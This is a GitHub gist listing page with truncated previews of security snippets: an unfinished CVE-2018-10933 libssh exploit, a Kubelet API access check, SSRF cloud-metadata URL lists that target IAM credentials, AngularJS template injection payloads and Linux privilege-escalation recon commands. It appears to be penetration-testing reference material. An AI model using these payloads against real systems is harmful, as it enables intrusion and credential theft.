Skip to content

Instantly share code, notes, and snippets.

View ayoubfathi's full-sized avatar

Ayoub FATHI ayoubfathi

View GitHub Profile
@dsuess
dsuess / create_function.py
Last active October 24, 2022 09:35 — forked from dhagrow/create_function.py
Dynamic function creation in Python
"""
Python is a dynamic language, and it is relatively easy to dynamically create
and modify things such as classes and objects. Functions, however, are quite
challenging to create dynamically.
One area where we might want to do this is in an RPC library, where a function
defined on a server needs to be available remotely on a client.
The naive solution is to simply pass arguments to a generic function that
accepts `*args` and `**kwargs`. A lot of information is lost with this approach,
however, in particular the number of arguments taken. Used in an RPC
implementation, this also delays any error feedback until after the arguments
@mlosapio
mlosapio / CVE-2018-10933-test
Last active February 3, 2024 18:50
#!/usr/bin/env python
# Based on https://www.openwall.com/lists/oss-security/2018/08/16/1
# untested CVE-2018-10933
import sys, paramiko
import logging
username = sys.argv[1]
hostname = sys.argv[2]
command = sys.argv[3]
@lizrice
lizrice / kubelet-api.md
Last active March 15, 2023 12:13
Checking Kubelet API access

Accessing Kubelet API

curl -sk https://localhost:10250/pods/
  • If --anonymous-auth is turned off, you will see a 401 Unauthorized response.
  • If --anonymous-auth is true and --authorization-mode is Webhook you'll see 403 Forbidden response with message Forbidden (user=system:anonymous, verb=get, resource=nodes, subresource=proxy)
  • If --anonymous-auth is true and --authorization-mode is AlwaysAllow you'll see a list of pods.
@7MinSec
7MinSec / Password_cracking_in_the_cloud.md
Last active August 24, 2023 14:24
Password cracking in the cloud
@jhaddix
jhaddix / cloud_metadata.txt
Last active April 25, 2024 11:19 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@mccabe615
mccabe615 / AngularTI.md
Last active April 18, 2024 11:37
Angular Template Injection Payloads

1.3.2 and below

{{7*7}}

'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';
@BuffaloWill
BuffaloWill / cloud_metadata.txt
Last active April 16, 2024 04:15
Cloud Metadata Dictionary useful for SSRF Testing
## IPv6 Tests
http://[::ffff:169.254.169.254]
http://[0:0:0:0:0:ffff:169.254.169.254]
## AWS
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
@sckalath
sckalath / linux_privesc
Last active April 10, 2024 19:58
Linux Privilege Escalation Techniques
// Determine linux distribution and version
cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release
cat /etc/redhat-release
// Determine kernel version - 32 or 64-bit?
cat /proc/version
uname -a
uname -mrs